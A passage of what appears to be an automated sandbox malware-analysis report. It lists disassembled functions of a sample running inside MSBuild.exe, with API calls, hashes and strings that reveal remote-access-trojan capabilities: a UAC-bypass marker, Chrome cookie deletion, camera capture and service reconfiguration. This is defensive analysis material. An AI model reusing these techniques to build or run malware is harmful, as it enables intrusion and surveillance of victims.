                                                                                                                                            • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                                                            Function 0044FCDB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                                                                                                            • _free.LIBCMT ref: 0044FD29
                                                                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                                            • _free.LIBCMT ref: 0044FD34
                                                                                                                                            • _free.LIBCMT ref: 0044FD3F
                                                                                                                                            • _free.LIBCMT ref: 0044FD93
                                                                                                                                            • _free.LIBCMT ref: 0044FD9E
                                                                                                                                            • _free.LIBCMT ref: 0044FDA9
                                                                                                                                            • _free.LIBCMT ref: 0044FDB4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                                            • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                                                                                                            • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                                            • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                                                                                                            Function 00406815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe), ref: 00406835
                                                                                                                                              • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                                                              • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                                            • CoUninitialize.OLE32 ref: 0040688E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                                            • API String ID: 3851391207-1840432179
                                                                                                                                            • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                                                            • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                                                                            • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                                                            • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                                                                            Function 0040FED2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                                                                            • int.LIBCPMT ref: 0040FEF2
                                                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                            • String ID: H]G
                                                                                                                                            • API String ID: 2536120697-1717957184
                                                                                                                                            • Opcode ID: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                                                                            • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                                                                                                            • Opcode Fuzzy Hash: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                                                                            • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                                                                                                            Function 0040B2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                                                            • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                                                            Strings
                                                                                                                                            • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                                                            • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                                                            • UserProfile, xrefs: 0040B2B4
                                                                                                                                            • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                                                            • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                            • API String ID: 2018770650-304995407
                                                                                                                                            • Opcode ID: ee578fe998e79df25f0549cf5f4ca79d5eb27d28ea68ce1bf511d2245c481035
                                                                                                                                            • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                                                                                                            • Opcode Fuzzy Hash: ee578fe998e79df25f0549cf5f4ca79d5eb27d28ea68ce1bf511d2245c481035
                                                                                                                                            • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                                                                                                            Function 004064D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 00406927
                                                                                                                                            • BG, xrefs: 00406909
                                                                                                                                            • Rmc-QM0FWK, xrefs: 0040693F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$Rmc-QM0FWK$BG
                                                                                                                                            • API String ID: 0-1142441036
                                                                                                                                            • Opcode ID: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
                                                                                                                                            • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                                                                            • Opcode Fuzzy Hash: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
                                                                                                                                            • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                                                                            Function 004425D9 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002), ref: 004425F9
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044262F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                            • String ID: CorExitProcess$mscoree.dll$u;~/
                                                                                                                                            • API String ID: 4061214504-2777637902
                                                                                                                                            • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                                            • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                                                                                                            • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                                            • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                                                                                                            Function 00419F32 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                                                                                                            • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                                                                                                            • Sleep.KERNEL32(00002710), ref: 00419F79
                                                                                                                                            • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                                            • String ID: Alarm triggered$`v
                                                                                                                                            • API String ID: 614609389-3040121899
                                                                                                                                            • Opcode ID: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                                                                                            • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                                                                                                            • Opcode Fuzzy Hash: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                                                                                            • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                                                                                                            Function 004395FC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __allrem.LIBCMT ref: 00439789
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                                                                                            • __allrem.LIBCMT ref: 004397BC
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                                                                                            • __allrem.LIBCMT ref: 004397F1
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1992179935-0
                                                                                                                                            • Opcode ID: 088a2e1066119da7e611ebb0c50ba568729b81e5e50e163a33f94ab824c18df8
                                                                                                                                            • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                                                                                            • Opcode Fuzzy Hash: 088a2e1066119da7e611ebb0c50ba568729b81e5e50e163a33f94ab824c18df8
                                                                                                                                            • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                                                                                            Function 10008821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                                            • __freea.LIBCMT ref: 10008A08
                                                                                                                                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                            • __freea.LIBCMT ref: 10008A11
                                                                                                                                            • __freea.LIBCMT ref: 10008A36
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1414292761-0
                                                                                                                                            • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                            • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                                            • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                            • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                                                                            Function 00444B3D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __cftoe
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4189289331-0
                                                                                                                                            • Opcode ID: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
                                                                                                                                            • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                                                                                            • Opcode Fuzzy Hash: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
                                                                                                                                            • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                                                                                            Function 00403DE7 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 135sleepCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                                                                              • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prologSleep
                                                                                                                                            • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                                                                                            • API String ID: 3469354165-462540288
                                                                                                                                            • Opcode ID: 74b81fa96e7e5076f3accc36f300641f5859c8e4b9fb844b7f267ff1e29a7abd
                                                                                                                                            • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                                                                                                            • Opcode Fuzzy Hash: 74b81fa96e7e5076f3accc36f300641f5859c8e4b9fb844b7f267ff1e29a7abd
                                                                                                                                            • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                                                                                                            Function 100015DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _strlen.LIBCMT ref: 10001607
                                                                                                                                            • _strcat.LIBCMT ref: 1000161D
                                                                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                                            • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1922816806-0
                                                                                                                                            • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                            • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                                                            • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                            • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                                                            Function 10001000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3594823470-0
                                                                                                                                            • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                            • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                                                            • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                            • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                                                            Function 00419DEC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                                                                                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 493672254-0
                                                                                                                                            • Opcode ID: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                                                                            • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                                                                                            • Opcode Fuzzy Hash: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                                                                            • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                                                                                                            Function 10003856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                                            • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                            • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                            • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                                                            • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
